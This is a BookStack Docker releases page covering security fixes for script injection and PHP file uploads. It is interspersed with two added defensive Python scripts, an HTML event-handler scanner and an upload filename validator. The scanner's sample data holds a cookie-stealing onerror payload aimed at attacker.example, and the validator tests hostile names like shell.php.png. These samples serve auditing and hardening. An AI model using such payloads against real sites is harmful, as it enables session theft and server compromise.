Releases: linuxserver/docker-bookstack
v0.26.1-ls41
LinuxServer Changes:
Rebase to Alpine 3.9, add MySQL init logic.
bookstack Changes:
This release contains the following fixes and changes:
- Updated Swedish translations. Thanks to @Hambern. (#1433)
- Updated Spanish translations. Thanks to @moucho. (#1420)
- Updated Ukrainian translations. Thanks to @Mant1kor. (#1419)
- Updated tabbing order on login forms to be consistent and as expected. (#1418)
- Fixed issue where "Toggle Details" Button does not properly save state when using the Guest user. (#1431)
- Fixed issue where editor image paste, and markdown drawing insert, would fail with an error. (#1428)
- Fixed styling of card headers on the 404 page. (#1427)
- Fixed issues where Book names could leak via the shelves listing when set as the homepage option. (#1425)
Special thanks to @Bolthier for providing many good, detailed, bug reports since yesterday's release.
v0.26.0-ls41
LinuxServer Changes:
Rebase to Alpine 3.9, add MySQL init logic.
bookstack Changes:
Upgrade Notes
Internet Explorer Support - IE11 support has now been dropped. We may still address critical issues in view-only scenarios; otherwise please use a modern browser.
Translations - Since many interfaces and lines of text have been updated, it may take a little while for some translations to catch up. Expect to see more English text than usual if you're using a non-English language option.
Images - Due to changes in how images are handled, as detailed below, some types of images may become inaccessible. Old logo images will be deleted when changed. Unused Book/Shelf cover images and user profile images will become inaccessible after the update, so you may want to delete them before upgrading.
Security - On previous versions of BookStack it was possible for users to insert JavaScript via the Markdown editor using on* HTML attributes (inline event handlers such as onerror or onclick). These are now removed on page render unless you have set ALLOW_CONTENT_SCRIPTS=true. Note that the stored page content is not rewritten, only the rendered output is filtered, so if untrusted users have access to your BookStack you may want to scan for " on" (a space followed by "on") in the html column of the pages table to identify any malicious intent.
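The scan suggested above is easy to do but a bare " on" substring also matches ordinary prose ("click on Save"). The following is an added example, not BookStack's or LinuxServer's code, that walks stored page HTML with Python's standard html.parser and reports only real on* attributes on tags, regardless of attribute case or quoting. It assumes the pages table exposes id, name and html columns (only html is named in the release note), the tighter MySQL REGEXP shown is a suggestion of this example, and the sample rows are constructed for illustration.

```python
"""Audit stored BookStack page HTML for inline JS event-handler attributes.

Added example, not BookStack code. Assumes page rows carry `id`, `name` and
`html` (the release note only names the `html` column of the `pages` table).
The sample rows at the bottom are constructed for illustration.
"""
from html.parser import HTMLParser

# A tighter MySQL query than `LIKE '% on%'`, which also matches prose such as
# "click on the link". Stays inside a single tag: no '>' between '<' and 'on'.
# Assumed schema: table `pages` with columns id, name, html.
SUGGESTED_SQL = (
    "SELECT id, name FROM pages "
    "WHERE html REGEXP '<[^>]*[[:space:]]on[a-z]+[[:space:]]*='"
)


class EventHandlerFinder(HTMLParser):
    """Collect (tag, attribute, value) for every on* attribute seen."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases attribute names, so ONERROR is caught as well.
        # Self-closing tags (<img .../>) also arrive here via handle_startendtag.
        for name, value in attrs:
            if name.startswith("on"):
                # A value-less attribute (<span onclick>) is reported as "".
                self.findings.append((tag, name, value or ""))


def find_event_handlers(html):
    """Return a list of (tag, attr, value) tuples for on* attributes in html."""
    parser = EventHandlerFinder()
    parser.feed(html)
    parser.close()
    return parser.findings


def scan_pages(rows):
    """Return {page_id: findings} for every row whose html has on* attributes."""
    hits = {}
    for row in rows:
        findings = find_event_handlers(row["html"])
        if findings:
            hits[row["id"]] = findings
    return hits


# Constructed sample rows: a benign page whose prose contains " on", a page
# with an image carrying an onerror handler (what a Markdown paste could have
# produced), and a page with a mixed-case handler plus a value-less one.
SAMPLE_ROWS = [
    {"id": 1, "name": "Getting started",
     "html": "<p>Click on the <strong>Save</strong> button.</p>"},
    {"id": 2, "name": "Diagram",
     "html": '<p><img src="x" onerror="fetch(\'//attacker.example/c?\'+document.cookie)"></p>'},
    {"id": 3, "name": "Notes",
     "html": "<p><a href='/x' ONMOUSEOVER=alert(1)>hover</a> <span onclick>x</span></p>"},
]

if __name__ == "__main__":
    for page_id, findings in scan_pages(SAMPLE_ROWS).items():
        for tag, attr, value in findings:
            print(f"page {page_id}: <{tag}> {attr}={value!r}")
```

Run it against the rows returned by the query (or the whole table) to get a per-page list of offending tags; anything it finds would execute for every viewer on an instance that sets ALLOW_CONTENT_SCRIPTS=true, so those pages deserve a look at their revision history and author.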
Full List of Changes
- Updated the application design for better mobile functionality and improved general UX. (#1153)
- Updated how profile, system & cover images are set & added extra permission checks on image actions. (#1410, #1307, #1128)
- Added the possibility to create a book directly within a shelf. Thanks to @cw1998. (#1366, #1260)
- Added sign-up link to login form and fixed differing name validation on sign-up. Thanks to @cw1998. (#1395, #1239)
- Added code block syntax highlight for OCaml, Haskell, Rust. Thanks to @XVilka. (#1344)
- Updated page content script escaping logic to strip inline JS event attributes. Thanks to @Xiphoseer for reporting.
- Updated revision restore to require confirmation and changed the method from GET so it's less likely to be accidentally triggered. (#1321)
- Updated shortcut used for markdown drawing manager to be cross-platform. (#1228)
- Updated Swedish translations. Thanks to @Hambern. (#1417)
- Fixed issue where duplicate IDs could sometimes break pages. (#1393)
- Fixed issue where user role assignments were not remembered, for roles with a dot in the name, on validation failure. Thanks to @cw1998. (#1392, #1325)
- Fixed issue where the port would be ignored if a full LDAP server URI was used. (#1386, #1278)
- Dropped IE11 support. (#1164)
v0.25.5-pkg-4001e764-ls40
LinuxServer Changes:
Rebase to Alpine 3.9, add MySQL init logic.
bookstack Changes:
Security Release
This release works on the changes from v0.25.4 and v0.25.3 to include additional security measures on file uploads.
For this release, uploaded image files whose name includes more than a single extension are rejected, since such names could be used to upload executable files on some web servers. In addition, attachment uploads are now saved under randomly generated file names, removing user-controlled text from the stored path and making file-name based exploits harder.
Additional Changes
This release also contains the following translation updates:
v0.25.5-pkg-b16a636d-ls39
LinuxServer Changes:
Switching to new Base images, shift to arm32v7 tag.
bookstack Changes:
Security Release: same BookStack v0.25.5 notes as v0.25.5-pkg-4001e764-ls40 above.
v0.25.5-pkg-9f541cff-ls38
LinuxServer Changes:
Switching to new Base images, shift to arm32v7 tag.
bookstack Changes:
Security Release: same BookStack v0.25.5 notes as v0.25.5-pkg-4001e764-ls40 above.
v0.25.5-pkg-1eebeb22-ls37
LinuxServer Changes:
Switching to new Base images, shift to arm32v7 tag.
bookstack Changes:
Security Release: same BookStack v0.25.5 notes as v0.25.5-pkg-4001e764-ls40 above.
v0.25.5-pkg-285ed901-ls36
LinuxServer Changes:
Switching to new Base images, shift to arm32v7 tag.
bookstack Changes:
Security Release: same BookStack v0.25.5 notes as v0.25.5-pkg-4001e764-ls40 above.
v0.25.4-pkg-285ed901-ls36
LinuxServer Changes:
Switching to new Base images, shift to arm32v7 tag.
bookstack Changes:
Security Release
This release patches a security vulnerability that allowed PHP files using a non-.php extension to be uploaded via the image upload endpoints. The uploaded files could then be requested externally to perform malicious activity.
This continues the security updates made in v0.25.3; please see that release for further information on this kind of vulnerability.
This update applies a whitelist of file extensions to uploaded images so that PHP-like files, such as .phtml or .php3, cannot be used to exploit web servers configured to execute such files.
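The v0.25.4 and v0.25.5 notes above describe three upload controls: an allowlist of image extensions (so .php, .phtml, .php3 are refused), rejection of names carrying more than one extension (shell.php.png style names that some Apache setups hand to the PHP handler), and random server-side names for attachments. The following is an added example, not BookStack's own code, showing those controls together in Python; the allowlist, the helper names and the sample filenames are this example's assumptions.

```python
"""Image-upload filename validation and random attachment naming.

Added example, not BookStack code. Illustrates the controls described in the
v0.25.4 and v0.25.5 release notes: an extension allowlist, rejection of names
with more than one extension, and random server-side attachment names.
The allowlist and sample filenames are assumptions of this example.
"""
import os
import secrets

# Assumed allowlist; a real deployment uses whatever its image pipeline accepts.
ALLOWED_IMAGE_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "webp"}


def validate_image_filename(filename):
    """Return (ok, reason) for a user-supplied image filename.

    Checks, in order: a directory component (path traversal), a missing
    extension, more than one extension (shell.php.png, image.jpg.phtml), and
    an extension outside the allowlist (.php, .phtml, .php3, ...).
    """
    base = os.path.basename(filename)
    if base != filename or base in ("", ".", ".."):
        return False, "path component or empty name"
    parts = base.split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "missing extension"
    if len(parts) > 2:
        # "shell.php." also lands here: trailing dot gives an empty third part.
        return False, "multiple extensions"
    ext = parts[1].lower()
    if ext not in ALLOWED_IMAGE_EXTENSIONS:
        return False, f"extension .{ext} not allowed"
    return True, ""


def attachment_storage_name(original_name, nbytes=16):
    """Return (storage_name, display_name) for an uploaded attachment.

    The file is stored under a random hex name with no extension, so nothing
    the uploader typed reaches the filesystem path and the web server has no
    extension to map to a script handler. The original name is kept only as
    metadata for download headers.
    """
    return secrets.token_hex(nbytes), os.path.basename(original_name)


# Constructed sample uploads mapped to the verdict the validator should give.
SAMPLE_UPLOADS = {
    "photo.png": True,
    "Photo.JPG": True,            # case-insensitive allowlist match
    "shell.php": False,           # the v0.25.3 case
    "shell.phtml": False,         # the v0.25.4 cases
    "shell.php3": False,
    "shell.php.png": False,       # the v0.25.5 case: two extensions
    "image.jpg.phtml": False,
    "../avatar.png": False,       # path traversal attempt
    "logo": False,                # no extension at all
}


def check_all(uploads):
    """Run the validator over a mapping of filenames, returning name -> ok."""
    return {name: validate_image_filename(name)[0] for name in uploads}


if __name__ == "__main__":
    for name in SAMPLE_UPLOADS:
        ok, reason = validate_image_filename(name)
        print(f"{name:18} {'accept' if ok else 'reject: ' + reason}")
    stored, shown = attachment_storage_name("report final.pdf")
    print(f"attachment stored as {stored}, shown to users as {shown}")
```

Extension checks only look at the name, not the bytes; re-encoding uploaded images and configuring the web server so nothing under the upload directory is ever passed to an interpreter are the controls that hold even when a name check is bypassed.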
v0.25.4-pkg-a9e285e4-ls35
LinuxServer Changes:
Added php7-curl
bookstack Changes:
Security Release: same BookStack v0.25.4 notes as v0.25.4-pkg-285ed901-ls36 above.
v0.25.3-pkg-a9e285e4-ls35
LinuxServer Changes:
Added php7-curl
bookstack Changes:
Security Release
This release patches a security vulnerability that allowed PHP files to be uploaded via the image upload endpoints. The uploaded files could then be requested externally to perform malicious activity.
This is particularly an issue in environments where untrusted users have the permissions needed to upload images.
Please consider that malicious exploitation of this vulnerability may have allowed access to any other files on your server that the PHP process can read, including your BookStack .env file, so rotate any passwords or keys if you think this may have been exploited on your instance.
It is advised you update your BookStack instance as soon as possible.